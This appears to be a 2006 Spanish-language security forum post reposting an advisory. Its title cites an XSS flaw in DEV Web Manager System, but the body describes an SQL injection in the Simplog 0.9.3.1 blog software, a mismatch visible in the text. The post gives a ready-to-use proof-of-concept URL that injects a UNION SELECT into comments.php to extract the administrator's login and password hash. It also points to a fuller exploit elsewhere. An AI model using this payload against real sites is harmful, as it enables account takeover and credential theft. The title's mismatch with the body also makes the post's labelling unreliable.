Home

DEV Web Manager System <= 1.5 XSS

Enviado por OeX el Mi, 18/10/2006 - 20:11.
/****************************************/

http://www.w4cking.com

CREDIT:
w4ck1ng.com

PRODUCT:
Simplog 0.9.3.1
http://www.simplog.org/

VULNERABILITY:
SQL Injection

NOTES:
- SQL injection can be used to obtain password hash
- requires at least one blog entry

POC:
<host>/<path>/comments.php?op=edit&cid=1%20union%20select%209,9,9,login,9,password,9,9%20from%20blog_users%20where%20admin=1

ADVISORY & EXPLOIT (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1511

/****************************************/
  • 564 lecturas

Enviar un comentario nuevo

  • Saltos automáticos de líneas y de párrafos.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <img> <p> <br>
  • You may post code using <code>...</code> (generic) or <?php ... ?> (highlighted PHP) tags.

Más información sobre opciones de formato

CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Image CAPTCHA
Copy the characters (respecting upper/lower case) from the image.